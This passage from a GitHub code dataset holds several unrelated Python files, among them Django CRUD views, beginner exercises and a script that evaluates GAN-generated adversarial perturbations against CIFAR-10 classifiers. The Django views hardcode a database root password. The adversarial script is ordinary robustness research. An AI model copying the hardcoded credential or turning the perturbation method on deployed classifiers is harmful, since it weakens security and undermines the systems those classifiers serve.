self._get_sift_features(img1, img2)\n lk_features = self._get_lk_features(img1, img2)\n\n if (sift_features is None) and (lk_features is None):\n return None\n else:\n return pd.concat([lk_features, sift_features])\n","repo_name":"guischmitd/kddbr-2022","sub_path":"kddbr/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20550719334","text":"# 16*. Напишите программу,\n# которая вычисляет процентное содержание символов G (гуанин) и C (цитозин)\n# в введенной строке (программа не должна зависеть от регистра вводимых символов).\n# Например, в строке \"acggtgttat\" процентное содержание символов G и C равно 4/10 ⋅ 100 = 40.0\n# где 4 - это количество символов G и C, а 10 -- это длина строки.\nstring = input(\"Введите символы \")\nspis2 = []\nspis = [i for i in string]\nfor i in spis:\n if i == 'g' or i == 'G' or i == 'c' or i == 'C':\n spis2.append(i)\nprint(f\"Содержание гуанина и цитозина составялет {len(spis2) / len(spis) * 100} %\")","repo_name":"Janyasvetlovskiy/Evgeniy_Svetlovskiy_Homeworks1","sub_path":"sr1/task_16.py","file_name":"task_16.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70924262915","text":"# Stwórz dwie zmienne s1 i s2 przechowujące dowolne wyrazy, utwórz nowy łańcuch s3, dołączając s2 w środku s1.\n\ns1 = \"maslo\"\ns2 = \"maslane\"\n\nsrodek = int(len(s1)/2\n )\ns1_1 = s1[0:srodek]\ns1_2 = s1[srodek:len(s1)]\ns3 = s1_1 + s2 + s1_2\nprint(s3\n )\n# Utwórz skrypt, który zapyta użytkownika o tytuł książki, nazwisko autora, liczbę stron, a następnie:\ntytul = input(str(('Podaj tytuł ksiązki')\n ))\n\nstrony = input('podaj liczbę stron'\n )\nnazwisko = input(str('podaj nazwisko autora')\n )\ny = int(strony.isalpha()\n )\ntytul_1 = tytul.replace(\" \", \"\"\n )\nx = tytul_1.isalpha(\n)\ntytul_t = tytul.title(\n)\nnazwisko_t = nazwisko.title(\n)\ncalosc = tytul + strony + nazwisko\n\nprint(x, y\n )\nprint(tytul_t, nazwisko_t\n )\nprint(tytul_t, nazwisko_t, strony\n )\nprint(len(calosc)\n )\n\n\n\n\n","repo_name":"Jarwes00/KursPython2022","sub_path":"Homework/Ex_klasy_string.py","file_name":"Ex_klasy_string.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11604685863","text":"# 给定一个 n × n 的二维矩阵表示一个图像。\n#\n# 将图像顺时针旋转 90 度。\n#\n# 说明:\n#\n# 你必须在原地旋转图像,这意味着你需要直接修改输入的二维矩阵。请不要使用另一个矩阵来旋转图像。\n#\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/rotate-image\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\nfrom typing import List\n\n\nclass Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n if not matrix:\n return\n\n width = len(matrix[0])\n height = len(matrix)\n\n for h in range(height):\n for w in range(h, width):\n matrix[h][w], matrix[w][h] = matrix[w][h], matrix[h][w]\n\n for h in range(height):\n matrix[h].reverse()\n\n\ndef main():\n matrix = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n ]\n answer = [\n [7, 4, 1],\n [8, 5, 2],\n [9, 6, 3]\n ]\n\n # matrix[0][0] = matrix[2][0]\n # matrix[0][1] = matrix[1][0]\n # matrix[0][2] = matrix[0][0]\n #\n # matrix[1][0] = matrix[2][1]\n # matrix[1][1] = matrix[1][1]\n # matrix[1][2] = matrix[0][1]\n #\n # matrix[2][0] = matrix[2][2]\n # matrix[2][1] = matrix[1][2]\n # matrix[2][2] = matrix[0][2]\n\n matrix = [\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n [13, 14, 15, 16]\n ]\n answer = [\n [13, 9, 5, 1],\n [14, 10, 6, 2],\n [15, 11, 7, 3],\n [16, 12, 8, 4]\n ]\n\n solution = Solution()\n solution.rotate(matrix)\n assert matrix == answer, matrix\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"imckl/leetcode","sub_path":"medium/48-rotate-image.py","file_name":"48-rotate-image.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"13478249276","text":"from django.shortcuts import render\n\n# Create your views here.\nimport MySQLdb\nfrom django.shortcuts import render, redirect\nfrom sims.models import Student\n\ndef sqlconnect():\n conn = MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"wangyutai\", db=\"sms\", charset='utf8')\n return conn\n\n\n# Create your views here.\n# 学生信息列表处理函数\ndef index(request):\n # conn = sqlconnect()\n # with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n # cursor.execute(\"SELECT id,student_no,student_name FROM sims_student\")\n # students = cursor.fetchall()\n students = Student.objects.all()\n return render(request, 'student/index.html', {'students': students})\n\n\n# 学生信息新增处理函数\ndef add(request):\n if request.method == 'GET':\n return render(request, 'student/add.html')\n else:\n student_no = request.POST.get('student_no', '')\n student_name = request.POST.get('student_name', '')\n # conn = sqlconnect()\n # with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n # cursor.execute(\"INSERT INTO sims_student (student_no,student_name) \"\n # \"values (%s,%s)\", [student_no, student_name])\n # conn.commit()\n student = Student()\n student.student_name = student_name\n student.student_no = student_no\n student.save()\n return redirect('../')\n\n\n# 学生信息修改处理函数\ndef edit(request):\n if request.method == 'GET':\n id = request.GET.get(\"id\")\n conn = sqlconnect()\n with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"SELECT id,student_no,student_name FROM sims_student where id =%s\", [id])\n student = cursor.fetchone()\n return render(request, 'student/edit.html', {'student': student})\n else:\n id = request.POST.get(\"id\")\n student_no = request.POST.get('student_no', '')\n student_name = request.POST.get('student_name', '')\n conn = sqlconnect()\n with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"UPDATE sims_student set student_no=%s,student_name=%s where id =%s\",\n [student_no, student_name, id])\n conn.commit()\n return redirect('../')\n\n\n# 学生信息删除处理函数\ndef delete(request):\n id = request.GET.get(\"id\")\n conn = sqlconnect()\n with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"DELETE FROM sims_student WHERE id =%s\", [id])\n conn.commit()\n return redirect('../')\n","repo_name":"751329612/3","sub_path":"sims/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44390166391","text":"import argparse\nimport os\nimport pickle\nfrom cv2 import log\n\nimport numpy as np\nimport torch\nimport torchattacks\nfrom matplotlib import pyplot as plt\n\nimport torchvision\nfrom torchvision import models, transforms\nfrom torchvision.datasets import ImageFolder\nfrom utils import *\nfrom generator_cifar10 import Generator, Discriminator\nimport collections\nfrom collections import Counter\nimport json\nfrom cifar10_models import *\nimport copy\n\n\nclass NpEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n if isinstance(obj, np.floating):\n return float(obj)\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\ndef calculate_pcc(x, y):\n \"\"\"\n Calculate pearsonr mimic `scipy.stats.pearsonr`\n :param x: Logit output (N, num_classes)\n :param y: Logit output (N, num_classes)\n :return: N\n \"\"\"\n pearson = []\n for i, j in zip(x, y):\n mean_x = torch.mean(i)\n mean_y = torch.mean(j)\n xm = i.sub(mean_x)\n ym = j.sub(mean_y)\n\n r_num = xm.dot(ym)\n r_den = torch.norm(xm, 2) * torch.norm(ym, 2)\n r_val = r_num / r_den\n pearson.append(r_val.item())\n return pearson\n\n\ndef load_model(archs):\n model_list = {}\n for arch, ckpt_path in archs.items():\n normalize = Normalize(mean=[0.4914, 0.4822, 0.4465],\n std=[0.2023, 0.1994, 0.2010])\n model = globals()[arch]()\n ckpt = torch.load(ckpt_path)\n model = torch.nn.Sequential(normalize, model)\n model.load_state_dict(ckpt['state_dict'])\n # model = model[1] # only use the model, rather than the normalize\n model.eval()\n model.to(device)\n model_list[arch] = model\n return model_list\n\n\ndef calculate_mertic(pert, labels, adv_logits, clean_logits, pert_logits):\n \"\"\"\n Calculate the metric\n :param pert:\n :param labels:\n :param adv_logits:\n :param clean_logits:\n :param pert_logits:\n :return: numpy list\n \"\"\"\n clean_pert_logits = clean_logits + pert_logits\n\n clean_pred = torch.argmax(clean_logits, dim=1)\n adv_pred = torch.argmax(adv_logits, dim=1)\n pert_pred = torch.argmax(pert_logits, dim=1)\n adv_ops_pred = torch.argmax(clean_pert_logits, dim=1)\n\n accuracy_clean = torch.sum(clean_pred == labels).item()\n accuracy_adv = torch.sum(adv_pred == labels).item()\n accuracy_op = torch.sum(adv_pred == adv_ops_pred).item()\n accuracy_op_fr = torch.sum((adv_pred == adv_ops_pred) == (adv_pred != clean_pred)).item()\n fooling_num = torch.sum(adv_pred != clean_pred).item()\n accuracy_adv_pert = torch.sum(adv_pred == pert_pred).item()\n\n pert_norm = [torch.norm(pi, p=2).item() for pi in pert]\n\n pcc_value_adv_clean = calculate_pcc(adv_logits, clean_logits)\n pcc_value_adv_pert = calculate_pcc(adv_logits, pert_logits)\n pcc_value_adv_pert_clean = calculate_pcc(adv_logits, clean_pert_logits)\n\n return adv_pred.cpu().data.numpy(), pert_pred.cpu().data.numpy(), adv_ops_pred.cpu().data.numpy(), \\\n accuracy_clean, accuracy_adv, accuracy_op, accuracy_op_fr, fooling_num, accuracy_adv_pert,\\\n pert_norm, pcc_value_adv_clean, pcc_value_adv_pert, pcc_value_adv_pert_clean\n\n\n\n\ndef test_advops_generator(generator, model_list):\n fooling_num = 0\n accuracy_op = 0\n accuracy_clean = 0\n accuracy_adv = 0\n accuracy_adv_pert = 0\n l2_norms_list = []\n total_cnt = 0\n mertics_dict = {}\n tmp_dict = {\n \"adv_cls\":[],\n \"pert_cls\":[],\n \"clean_pert_cls\":[],\n\n \"l2_norms_list\":[],\n \"pcc_adv_clean\":[],\n \"pcc_value_adv_pert\":[],\n \"pcc_value_adv_pert_clean\":[],\n\n \"acc_clean\":0,\n \"acc_adv\":0,\n \"acc_op\":0,\n \"acc_op_fr\":0,\n \"fooling_num\":0,\n \"accuracy_adv_pert\":0,\n \"total_samples\":0,\n }\n for i, batch in enumerate(validation_loader):\n\n images, labels = batch\n images, labels = images.to(device), labels.to(device)\n\n # train the discriminator with fake data\n pert = generator(images)\n adv_images = torch.clamp(images + pert, 0, 1)\n\n pert = 1.0 / 2 * (pert + 1)\n for key, model in model_list.items():\n with torch.no_grad():\n f_adv = model(adv_images)\n f_clean = model(images)\n f_pert = model(pert)\n\n adv_pred, pert_pred, adv_ops_pred, \\\n acc_clean, acc_adv, acc_op, acc_op_fr, fooling_num, adv_pert_num, \\\n pert_norm, \\\n pcc_value_adv_clean, pcc_value_adv_pert, pcc_value_adv_pert_clean = calculate_mertic(pert, labels,\n f_adv, f_clean,\n f_pert)\n\n if key not in mertics_dict:\n mertics_dict[key] = copy.deepcopy(tmp_dict)\n mertics_dict[key]['adv_cls'].extend(adv_pred)\n mertics_dict[key]['pert_cls'].extend(pert_pred)\n mertics_dict[key]['clean_pert_cls'].extend(adv_ops_pred)\n\n mertics_dict[key]['acc_clean'] += acc_clean\n mertics_dict[key]['acc_adv'] += acc_adv\n mertics_dict[key]['acc_op'] += acc_op\n mertics_dict[key]['acc_op_fr'] += acc_op_fr\n mertics_dict[key]['fooling_num'] += fooling_num\n mertics_dict[key]['accuracy_adv_pert'] += adv_pert_num\n\n mertics_dict[key]['l2_norms_list'].extend(pert_norm)\n mertics_dict[key]['pcc_adv_clean'].extend(pcc_value_adv_clean)\n mertics_dict[key]['pcc_value_adv_pert'].extend(pcc_value_adv_pert)\n mertics_dict[key]['pcc_value_adv_pert_clean'].extend(pcc_value_adv_pert_clean)\n\n mertics_dict[key]['total_samples'] += images.size(0)\n return mertics_dict\n\n\ndef post_propress_dict_data(data_dict, model_list):\n for key, model in model_list.items():\n # most common top100\n data_dict[key]['adv_cls'] = Counter(data_dict[key]['adv_cls']).most_common(100)\n data_dict[key]['pert_cls'] = Counter(data_dict[key]['pert_cls']).most_common(100)\n data_dict[key]['clean_pert_cls'] = Counter(data_dict[key]['clean_pert_cls']).most_common(100)\n\n data_dict[key]['acc_clean'] = round(\n data_dict[key]['acc_clean'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['acc_adv'] = round(\n data_dict[key]['acc_adv'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['acc_op'] = round(\n data_dict[key]['acc_op'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['acc_op_fr'] = round(\n data_dict[key]['acc_op_fr'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['fooling_num'] = round(\n data_dict[key]['fooling_num'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['accuracy_adv_pert'] = round(\n data_dict[key]['accuracy_adv_pert'] * 100 / data_dict[key]['total_samples'], 2)\n\n data_dict[key]['l2_norms_list'] = round(np.mean(data_dict[key]['l2_norms_list']), 2)\n data_dict[key]['pcc_adv_clean'] = round(np.mean(data_dict[key]['pcc_adv_clean']), 2)\n data_dict[key]['pcc_value_adv_pert'] = round(np.mean(data_dict[key]['pcc_value_adv_pert']), 2)\n data_dict[key]['pcc_value_adv_pert_clean'] = round(\n np.mean(data_dict[key]['pcc_value_adv_pert_clean']), 2)\n return data_dict\n\n\ndef get_model_list(model_name):\n normalize = Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n model_list = {}\n for mn in model_name:\n if \"resnet50\" in mn.lower():\n model = models.resnet50(pretrained=True)\n elif \"vgg16\" in mn.lower():\n model = models.vgg16(pretrained=True)\n elif \"densenet121\" in mn.lower():\n model = models.densenet121(pretrained=True)\n elif \"resnext\" in mn.lower():\n model = models.resnext50_32x4d(pretrained=True)\n elif \"wideresnet\" in mn.lower():\n model = models.wide_resnet50_2(pretrained=True)\n elif \"mnasnet\" in mn.lower():\n model = models.mnasnet1_0(pretrained=True)\n elif \"squeezenet\" in mn.lower():\n model = models.squeezenet1_0(pretrained=True)\n\n model = torch.nn.Sequential(normalize, model)\n model.eval()\n model.to(device)\n model_list[mn] = model\n return model_list\n\n\ndef load_cifar10(args):\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n ])\n testset = torchvision.datasets.CIFAR10(root=args.data_path, train=False,\n download=True, transform=transform_test)\n return testset\n\ndef get_args():\n parser = argparse.ArgumentParser(description=\"Args Container\")\n parser.add_argument(\"--data_dir\", type=str, default=r'/mnt/jfs/wangdonghua/pythonpro/AdvOps/cifar10_models/data')\n parser.add_argument(\"--ckpt_path\", type=str, default='checkpoints/')\n parser.add_argument(\"--model_ckpt\", type=str, default='cifar10_models/checkpoints/')\n parser.add_argument(\"--model_name\", type=str, default='resnet50', help=\"model name of the evluation model\")\n parser.add_argument(\"--loss_idx\", type=int, default=0, help=\"0: custom_loss, 1: mse_loss, 2:kl_loss\")\n parser.add_argument(\"--input_size\", type=int, default=224)\n parser.add_argument(\"--batch_size\", type=int, default=200)\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n idx2label, _ = get_imagenet_dicts()\n args = get_args()\n\n test_transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(args.input_size),\n transforms.ToTensor(),\n ])\n # dataset\n test_data = load_cifar10(args)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n model_name_list = {\n 'preactresnet18':f\"{args.model_ckpt}/CIFAR10_preactresnet18.pth.tar\",\n 'wideresnet':f\"{args.model_ckpt}/CIFAR10_wideresnet.pth.tar\",\n \"resnet50\": f\"{args.model_ckpt}/CIFAR10_resnet50.pth.tar\",\n \"densenet121\": f\"{args.model_ckpt}/CIFAR10_densenet121.pth.tar\",\n \"vgg16\": f\"{args.model_ckpt}/CIFAR10_vgg16.pth.tar\",\n \"vgg19\": f\"{args.model_ckpt}/CIFAR10_vgg19.pth.tar\"\n }\n\n model_list = load_model(model_name_list)\n\n model_name_list = list(model_name_list.keys())\n logit_type = [\"custom_loss\", \"mse_loss\", \"kl_loss\"]\n\n specific_str = f'{model_name_list[args.model_name]}_{logit_type[args.loss_idx]}'\n\n validation_loader = torch.utils.data.DataLoader(test_data, batch_size=args.batch_size)\n\n generator_ckpt_file_dict = {\n \"CIFAR10_resnet50\": f'{args.ckpt_path}/CIFAR10_Generator_for_resnet50.pth',\n \"CIFAR10_vgg16\": f'{args.ckpt_path}/CIFAR10_Generator_for_vgg16.pth',\n \"CIFAR10_vgg19\": f'{args.ckpt_path}/CIFAR10_Generator_for_vgg19.pth',\n \"CIFAR10_densenet121\": f'{args.ckpt_path}/CIFAR10_Generator_for_densenet121.pth',\n \"CIFAR10_preactresnet18\": f'{args.ckpt_path}/CIFAR10_Generator_for_preactresnet18.pth',\n \"CIFAR10_wideresnet50\": f'{args.ckpt_path}/CIFAR10_Generator_for_wideresnet50.pth',\n }\n\n ckpt_file = generator_ckpt_file_dict[f\"CIFAR10_{args.model_name}\"]\n\n g = Generator(3, 3)\n g.load_state_dict(torch.load(ckpt_file))\n g = g.to(device)\n g.eval()\n model_name = model_name_list[0]\n attack_metric_dict = test_advops_generator(g, model_list)\n attack_metric_dict = post_propress_dict_data(attack_metric_dict, model_list)\n print(f\"Target model: {model_name}\\n Attack: AdvOpsGAN\\n\", attack_metric_dict)\n result_dict = {\n \"attack\": \"AdvOpsGAN\",\n \"target_model\": model_name,\n \"result\": attack_metric_dict\n }\n try:\n json_string = json.dumps(result_dict, sort_keys=False, cls=NpEncoder)\n with open(f\"baseline_evaluate_result/{model_name}_AdvOpsGAN_{specific_str}.json\", 'w') as fw:\n fw.write(json_string)\n except:\n with open(f\"baseline_evaluate_result/{model_name}_AdvOpsGAN_{specific_str}.pkl\", 'w') as fw:\n pickle.dump(result_dict, fw)\n finally:\n np.save(f\"baseline_evaluate_result/{model_name}_AdvOpsGAN_{specific_str}.npy\", result_dict)\n","repo_name":"winterwindwang/AdvOps","sub_path":"baseline_methods_transfer_gan_cifar10.py","file_name":"baseline_methods_transfer_gan_cifar10.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31266492915","text":"import io\nimport os\nimport json\nimport logging\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport matplotlib.pyplot as plt\n\ntfkl = tf.keras.layers\ntfkc = tf.keras.callbacks\ntfd = tfp.distributions\ntfb = tfp.bijectors\n\ndtype = tf.float32\n\nlogger = logging.getLogger(__name__)\n\n\ndef pretty_json(hp):\n json_hp = json.dumps(hp, indent=2)\n return \"\".join(\"\\t\" + line for line in json_hp.splitlines(True))\n\n\ndef lognormal_pdf(loc, scale):\n \"\"\" Lognormal definition as in Wikipedia (FU scipy) \"\"\"\n\n def pdf_fn(x):\n norm = np.sqrt(2 * np.pi) * scale * x\n arg = - (np.log(x) - loc) ** 2 / (2 * scale ** 2)\n return np.exp(arg) / norm\n\n return pdf_fn\n\n\ndef plot_to_image(figure):\n \"\"\"\n Converts the matplotlib plot specified by 'figure' to a PNG image and\n returns it. The supplied figure is closed and inaccessible after this\n call.\n \"\"\"\n\n # Save the plot to a PNG in memory.\n buf = io.BytesIO()\n # plt.savefig(buf, format='png')\n figure.savefig(buf, format='png')\n\n # Closing the figure prevents it from being displayed directly inside\n # the notebook.\n plt.close(figure)\n buf.seek(0)\n\n # Convert PNG buffer to TF image\n image = tf.image.decode_png(buf.getvalue(), channels=4)\n\n # Add the batch dimension\n image = tf.expand_dims(image, 0)\n\n return image\n\n\ndef fig_mean_to_std_distribution(df: pd.DataFrame):\n \"\"\"\n Plot the distribution of the mean to standard deviation ratios\n of the predicted distributions\n \"\"\"\n\n label = 'mean to std ratio of predicted distributions'\n\n fig = plt.figure()\n plt.hist(df['mean'] / df['std'], bins=100, label=label)\n plt.legend()\n\n return fig\n\n\ndef fig_median_to_pct_range_distribution(\n df: pd.DataFrame, qtile_range: tuple[float, float]\n):\n \"\"\"\n Plot the distribution of the ratio btw the median and some percentile\n range.\n\n Params\n ------\n df: table with the columns:\n `q_050`: median\n `q_`: first element of qtile_range\n `q_`: second element of qtile_range\n qtile_range:\n \"\"\"\n\n q1, q2 = qtile_range\n c1, c2 = f'q_{int(q1 * 100):03d}', f'q_{int(q2 * 100):03d}'\n label = f'median to ({c2} - {c1}) ratio of predicted distributions'\n\n fig = plt.figure()\n plt.hist(df['q_050'] / (df[c2] - df[c1]), bins=100, label=label)\n plt.legend()\n\n return fig\n\n\ndef fig_pct_skew(df: pd.DataFrame):\n \"\"\"\n Plot distribution percentile of true values vs fraction of\n observations that belong to a lower percentile\n\n Params\n ------\n df: table with the columns:\n `pct`: percentile to which the observed value corresponds to\n `frac`: fraction of observations that belong to a lower predicted\n percentile\n \"\"\"\n\n label = ('Predicted percentile vs fraction of observations '\n 'that belong to a lower predicted percentile')\n\n fig = plt.figure(figsize=(15, 10))\n plt.scatter(df['pct'], df['frac'], alpha=0.2, s=20, label=label)\n plt.plot([0, 1], [0, 1], color='black', linestyle='dashed')\n plt.legend()\n\n return fig\n\n\ndef fig_pct_skew_discrete(df: pd.DataFrame, quantiles: list):\n \"\"\"\n For a discrete number of predicted percentiles calculate and visualize\n the fraction of observations that are below this percentile\n\n Params\n ------\n df: table with the columns:\n q_< pct >: predicted distribution percentiles\n y: observed value\n \"\"\"\n\n frac = [(df['y'] < df[f'q_{int(q * 100):03d}']).mean()\n for q in quantiles]\n\n label = ('Predicted percentile vs fraction of observations \\n'\n 'that belong to a lower predicted percentile')\n\n fig = plt.figure()\n plt.scatter(quantiles, frac, label=label)\n plt.plot([0, 1], [0, 1], color='black', linestyle='dashed')\n plt.legend()\n\n return fig\n\n\ndef evaluate_percentile_model(\n model,\n ds,\n log_dir: str,\n log_data: dict,\n quantiles: tuple,\n qtile_range: tuple[float, float]\n):\n \"\"\" Compare predicted percentiles against observations \"\"\"\n\n save_dir = os.path.join(log_dir, 'train')\n file_writer = tf.summary.create_file_writer(save_dir)\n\n df = pd.DataFrame()\n df['y'] = np.hstack(list(ds.map(lambda x, y: y).as_numpy_iterator()))\n\n pct_columns = [f'q_{int(x * 100):03d}' for x in quantiles]\n df[pct_columns] = model.predict(ds.map(lambda x, y: x))\n\n fig = fig_pct_skew_discrete(df, quantiles=quantiles)\n\n with file_writer.as_default():\n name = 'predicted pct vs frac of observations with lower predicted pct'\n img = plot_to_image(fig)\n tf.summary.image(name, img, step=0)\n\n fig = fig_median_to_pct_range_distribution(df, qtile_range=qtile_range)\n\n with file_writer.as_default():\n name = \"median to pct-range of predicted distributions\"\n img = plot_to_image(fig)\n tf.summary.image(name, img, step=0)\n\n with file_writer.as_default():\n log_data = pretty_json(log_data)\n tf.summary.text(\"experiment_args\", log_data, step=0)\n\n\ndef evaluate_parametrized_pdf_model(\n model, ds, log_dir: str, log_data: dict, clusters: int = 20\n):\n \"\"\" Compare predicted distributions against observations \"\"\"\n\n save_dir = os.path.join(log_dir, 'train')\n file_writer = tf.summary.create_file_writer(save_dir)\n\n distribution_fn = model.layers[-1].function\n\n model_deterministic = tf.keras.Model(\n inputs=model.inputs,\n outputs=[model.layers[-2].output])\n\n df = pd.DataFrame()\n\n df['y'] = np.hstack(list(ds.map(lambda x, y: y).as_numpy_iterator()))\n\n # predict distribution parameters\n df[['p1', 'p2']] = model_deterministic.predict(ds.map(lambda x, y: x))\n\n distribution = distribution_fn(df[['p1', 'p2']].values)[0]\n\n df['mean'] = distribution.mean()\n df['std'] = distribution.stddev()\n df['pct'] = distribution.cdf(df[['y']].values)\n\n # fraction of prediction with lower percentile\n df = df.assign(frac=lambda x: (x['pct'].sort_values() * 0 + 1).cumsum() / x.shape[0])\n\n \"\"\"\n Figures\n \"\"\"\n\n fig = fig_mean_to_std_distribution(df=df)\n\n with file_writer.as_default():\n name = \"mean to std ratio of predicted distributions\"\n img = plot_to_image(fig)\n tf.summary.image(name, img, step=0)\n\n fig = fig_pct_skew(df.iloc[:1_000])\n\n with file_writer.as_default():\n name = 'predicted pct vs frac of observations with lower predicted pct'\n img = plot_to_image(fig)\n tf.summary.image(name, img, step=0)\n\n with file_writer.as_default():\n log_data = pretty_json(log_data)\n tf.summary.text(\"experiment_args\", log_data, step=0)\n","repo_name":"ImScientist/probabilistic-forecasting-travel-time","sub_path":"src/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70661302914","text":"\"\"\"\nExtensions for pyrestcli Resource and Manager classes\n\n.. module:: carto.resources\n :platform: Unix, Windows\n :synopsis: Extensions for pyrestcli Resource and Manager classes\n\n.. moduleauthor:: Daniel Carrion \n.. moduleauthor:: Alberto Romeu \n\n\n\"\"\"\n\nimport warnings\n\nfrom pyrestcli.resources import Resource, Manager as PyRestCliManager\n\nfrom .exceptions import CartoException\n\n\nclass AsyncResource(Resource):\n def run(self, **client_params):\n \"\"\"\n Actually creates the async job on the CARTO server\n\n\n :param client_params: To be send to the CARTO API. See CARTO's\n documentation depending on the subclass\n you are using\n :type client_params: kwargs\n\n\n :return:\n :raise: CartoException\n \"\"\"\n try:\n self.send(self.get_collection_endpoint(),\n http_method=\"POST\",\n **client_params)\n except Exception as e:\n raise CartoException(e)\n\n def refresh(self):\n \"\"\"\n Updates the information of the async job against the CARTO server.\n After calling the :func:`refresh` method you should check the `state`\n attribute of your resource\n\n :return:\n \"\"\"\n if self.get_resource_endpoint() is None:\n raise CartoException(\"Async job needs to be run or retrieved \\\n first!\")\n\n super(AsyncResource, self).refresh()\n\n\nclass WarnAsyncResource(AsyncResource):\n \"\"\"\n AsyncResource class for resources that represent non-public CARTO APIs.\n You'll be warned not to used the in production environments\n \"\"\"\n def __init__(self, auth_client, **kwargs):\n \"\"\"\n Initializes the resource\n :param auth_client: Client to make (non)authorized requests\n :param kwargs: Initial value for attributes\n :return:\n \"\"\"\n\n warnings.warn('This is part of a non-public CARTO API and may change in \\\n the future. Take this into account if you are using \\\n this in a production environment', FutureWarning)\n super(WarnAsyncResource, self).__init__(auth_client, **kwargs)\n\n\nclass WarnResource(Resource):\n \"\"\"\n Resource class for resources that represent non-public CARTO APIs.\n You'll be warned not to used the in production environments\n \"\"\"\n def __init__(self, auth_client, **kwargs):\n \"\"\"\n Initializes the resource\n :param auth_client: Client to make (non)authorized requests\n :param kwargs: Initial value for attributes\n :return:\n \"\"\"\n\n warnings.warn('This is part of a non-public CARTO API and may change in the future. Take this into account if you are using this in a production environment', FutureWarning)\n super(WarnResource, self).__init__(auth_client, **kwargs)\n\n\nclass Manager(PyRestCliManager):\n \"\"\"\n Manager class for resources\n \"\"\"\n def __init__(self, auth_client):\n \"\"\"\n :param auth_client: Client to make (non)authorized requests\n\n :return:\n \"\"\"\n self.paginator = self.paginator_class(self.json_collection_attribute,\n auth_client.base_url)\n super(PyRestCliManager, self).__init__(auth_client)\n","repo_name":"CartoDB/carto-python","sub_path":"carto/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"61"} +{"seq_id":"32943105487","text":"#! /usr/bin/env python3\n\nimport os\nimport cv2\nimport math\nimport torch\nimport warnings\nimport numpy as np\nfrom cv_bridge import CvBridge\nfrom pyquaternion import Quaternion as PyQuaternion\n\n# import the custom packages\nimport lib.my_utils as my_utils\nfrom yofo.model import Yofo\n\n# import the necessary ROS packages\nimport rospy\nimport message_filters\nfrom sensor_msgs.msg import Image\nfrom gazebo_msgs.msg import ModelStates\nfrom geometry_msgs.msg import Pose, Point\n\n\n\nPKG_PATH = os.path.dirname(os.path.abspath(__file__))\nMODELS_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", \"models\")\n\nMODELS = [\n \"X1-Y1-Z2\",\n \"X1-Y2-Z1\",\n \"X1-Y2-Z2\",\n \"X1-Y2-Z2-CHAMFER\",\n \"X1-Y2-Z2-TWINFILLET\",\n \"X1-Y3-Z2\",\n \"X1-Y3-Z2-FILLET\",\n \"X1-Y4-Z1\",\n \"X1-Y4-Z2\",\n \"X2-Y2-Z2\",\n \"X2-Y2-Z2-FILLET\"]\n\nPOSES = [\"UP\", \"DOWN\", \"NORTH\", \"SOUTH\", \"EAST\", \"WEST\"]\n\n\ndef init(camera_name):\n \"\"\"\n Initialize the camera parameters\n \"\"\"\n from sensor_msgs.msg import Image, CameraInfo\n from gazebo_msgs.srv import GetModelState\n camera_info = rospy.wait_for_message(\"/camera/color/camera_info\", CameraInfo)\n rospy.wait_for_service(\"/gazebo/get_model_state\")\n camera_state_srv = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)\n camera_state = camera_state_srv(camera_name, \"\") # Change this to your model name\n camera_pose = my_utils.rob2cam(camera_state.pose) # Convert to camera axis convention\n\n # Build camera reference frame\n camera_frame = np.zeros((4, 4), dtype=np.float64)\n camera_frame[:, 3] = [camera_pose.position.x, camera_pose.position.y, camera_pose.position.z, 1]\n camera_frame[:3, 